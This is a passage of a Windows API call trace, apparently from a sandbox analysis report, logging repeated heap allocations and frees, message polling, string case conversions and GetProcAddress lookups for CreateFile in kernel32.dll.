lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0034.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0034.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0034.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0034.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0034.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0034.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0034.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0034.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0034.073] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0034.073] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0034.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0034.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0034.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0034.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0034.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0034.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0034.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0034.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0034.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0034.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0034.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0034.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0034.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0034.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0034.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0034.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0034.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0034.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0034.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0034.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0034.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0034.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0034.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0034.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0034.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0034.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0034.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0034.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0034.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0034.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0034.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0034.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0034.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0034.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0034.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0034.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0034.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0034.074] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0034.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0034.074] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0034.074] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0034.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0034.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0034.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0034.074] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0034.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0034.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0034.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0034.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5b8 [0034.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0034.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0034.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0034.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0034.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0034.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0034.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0034.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889550 [0034.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0034.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0034.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0034.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0034.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0034.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0034.074] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0034.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0034.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0034.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0034.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0034.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0034.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0034.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0034.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0034.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0034.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0034.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0034.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0034.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0034.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0034.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0034.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0034.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0034.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0034.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0034.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0034.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0034.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0034.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0034.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0034.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0034.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0034.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0034.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0034.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0034.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0034.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0034.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0034.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0034.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0034.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0034.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0034.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0034.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0034.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0034.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0034.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0034.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0034.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0034.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0034.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0034.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0034.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0034.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0034.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0034.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0034.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0034.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0034.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0034.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0034.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0034.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0034.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0034.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0034.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0034.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0034.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0034.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0034.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0034.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0034.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0034.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0034.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0034.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0034.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0034.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0034.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0034.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0034.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0034.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0034.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0034.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0034.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0034.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0034.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0034.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0034.077] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0034.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0034.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0034.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0034.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0034.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0034.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0034.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0034.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0034.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0034.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0034.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0034.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0034.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0034.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0034.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0034.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0034.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0034.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0034.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0034.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0034.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0034.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0034.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0034.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0034.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0034.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0034.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0034.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0034.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0034.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0034.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0034.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0034.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0034.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0034.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0034.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0034.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0034.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0034.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0034.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0034.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0034.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0034.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0034.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0034.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0034.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0034.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0034.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0034.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0034.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0034.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0034.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0034.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0034.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0034.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0034.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0034.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0034.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0034.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0034.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0034.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0034.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0034.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0034.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0034.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0034.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0034.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0034.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0034.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0034.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0034.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0034.079] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0034.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0034.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0034.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0034.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88ce08 [0034.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88ce08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0034.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0034.080] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0034.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0034.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0034.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0034.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0034.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0034.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0034.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0034.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce08 [0034.080] 